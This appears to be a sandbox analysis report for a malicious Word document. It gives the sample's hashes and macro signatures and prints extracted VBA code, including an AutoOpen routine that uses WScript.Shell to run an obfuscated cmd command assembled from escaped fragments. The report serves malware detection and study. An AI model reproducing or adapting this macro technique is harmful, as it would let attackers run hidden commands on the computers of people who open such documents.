General

  • Target

    07ee44f9fa9188be620b38bd4494fd6c_JaffaCakes118

  • Size

    83KB

  • MD5

    07ee44f9fa9188be620b38bd4494fd6c

  • SHA1

    b079fbd5595c53ff4b8aee51aaece7792fb2eef6

  • SHA256

    fa22225bbaa33be9c57bf5bc3588b3e5dd4a6bcd531eb10fdf28ae5dc7c950f6

  • SHA512

    f86324391f3d32f7dde4d65bc70cfc1a260ae0b48dfa992bef94b604f775af0d0ed949245e8e6aff3163b788df0719f33502f0c9c0f49357d3360a95faa91db5

  • SSDEEP

    1536:SptJlmrJpmxlRw99NBk+aHJU4rTDUdUNAMeWT:Ote2dw99fb4r3UdqAMe

Malware Config

Signatures

  • Office macro that triggers on suspicious action 1 IoCs

    Office document macro which triggers in special circumstances - often malicious.

  • Suspicious Office macro 1 IoCs

    Office document equipped with macros.

Files

  • 07ee44f9fa9188be620b38bd4494fd6c_JaffaCakes118
    .doc windows office2003

    EaQtQvZi

    1
    Attribute VB_Name = "EaQtQvZi"
    2
    Attribute VB_Base = "1Normal.ThisDocument"
    3
    Attribute VB_GlobalNameSpace = False
    4
    Attribute VB_Creatable = False
    5
    Attribute VB_PredeclaredId = True
    6
    Attribute VB_Exposed = True
    7
    Attribute VB_TemplateDerived = True
    8
    Attribute VB_Customizable = True
    9

    GjWCjJazapR

    1
    Attribute VB_Name = "GjWCjJazapR"
    2
    Function LDVErTJs()
    3
    On Error Resume Next
    4
    Error 61956 * JuKbbO
    5
    ERirvVifR = "md /v^:" + "^ON^ " + " ^ /c" + Chr(2 + 3 + 2 + 1 + 26) + " " + " ^Se" + "^T ^" + " A^K=A" + "^ACA^gA"
    6
    Error 63986 * XMDXTr * JOwzq * fAnwYw
    7
    Error 69710 * FJwJcM
    8
    Error 98572 / ZWPJwP * JLoVuj * 88844
    9
    PohwL = "A^I^A^" + "ACA^g" + "A^A" + "^" + "I^A^" + "AC^A^g" + "AAIA^AC" + "Ag^A^A" + "I^A"
    10
    Error VwwJY / wRPYz

    umJJFLVjtf

    1
    Attribute VB_Name = "umJJFLVjtf"
    2
    Sub AutoOpen()
    3
    On Error Resume Next
    4
    Error lYVKNO / Xnbns
    5
    Error WSEwz * QVzcKw / 60661 * wkirVV
    6
    Error 62513 * zIacKW * 89634 * zpsut
    7
    bwdnukzCO = CreateObject("WScript.Shell") _
    8
    . _
    9
    Run _
    10
    (ChrW(3 + 5 + 9 + 11 + 39) + FRqPWUVUfbaE + rizjmazzZPXBF + LDVErTJs + QqtwSndqsl + zIUGwiLHwk + zzaRRzYGrvE + TIESXJwZMs + Yanrjzf + uBiIiVEfczn, 342822333 - 342822333)

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.